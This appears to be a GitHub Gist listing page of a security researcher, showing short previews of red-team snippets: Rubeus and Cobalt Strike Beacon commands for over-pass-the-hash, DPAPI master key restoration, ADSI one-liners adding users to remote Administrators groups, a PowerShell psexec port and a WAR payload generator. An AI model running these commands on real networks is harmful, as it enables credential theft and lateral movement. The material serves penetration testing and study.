Will HarmJ0y
Coding towards chaotic good while living on the decision boundary
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active July 15, 2023 14:43
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / git.txt
Created May 31, 2016 00:46
Common git commands
Show remote branches:
git branch -v -a
To check out the remote branch:
http://stackoverflow.com/questions/1783405/checkout-remote-git-branch
git fetch
git checkout <branch>
HarmJ0y / Restore-UserDPAPI.ps1
Last active July 7, 2023 09:05
Restore a user's stolen DPAPI master key folder and optional KeePass DPAPI data blob.
function Restore-UserDPAPI {
<#
.SYNOPSIS
Restores a user account's DPAPI master key on a new system.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / gist:fd98c4f16575ba28c091
Last active April 27, 2023 13:56
Powershell ADSI tricks
# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')
# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"
# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"
# Enable the local Administrator account on a remote server
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active January 30, 2023 11:54
ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
<#
.SYNOPSIS
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / powershell_talks.txt
Created February 14, 2017 13:20
PowerShell talks
BSides LV 2015 - "Building an Empire with PowerShell" - https://www.youtube.com/watch?v=Pq9t59w0mUI
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" - https://www.youtube.com/watch?v=xHkRhRo3l8o
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" - https://www.youtube.com/watch?v=RcDq9GgiUB4
PowerShell Summit 2016 - "Digital Forensics with PowerShell" - https://www.youtube.com/watch?v=gm9A7FaWTkY
BSides LV 2016 - "Building an EmPyre with Python" - https://www.youtube.com/watch?v=79qzgVTP3Yc
DerbyCon 2016 - "A Year in the Empire" - https://www.youtube.com/watch?v=ngvHshHCt_8
HarmJ0y / Invoke-Psexec.ps1
Last active September 12, 2022 02:41
Invoke-Psexec
function Invoke-PsExec {
<#
.SYNOPSIS
This function is a rough port of Metasploit's psexec functionality.
It utilizes Windows API calls to open up the service manager on
a remote machine, creates/run a service with an associated binary
path or command, and then cleans everything up.
Either a -Command or a custom -ServiceEXE can be specified.
For -Commands, a -ResultsFile can also be specified to retrieve the
HarmJ0y / psWar.py
Created September 15, 2015 07:51
PsWar
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):
HarmJ0y / Invoke-HostFile.ps1
Last active September 12, 2022 01:55
Host a single binary file without needing administrative privileges
Function Invoke-HostFile {
<#
.SYNOPSIS
Hosts a base64 string representation of a binary file or a given
$FilePath on the specified $Port. Any HTTP request to the given
host/port will return the binary data of the specified file.
.PARAMETER Base64File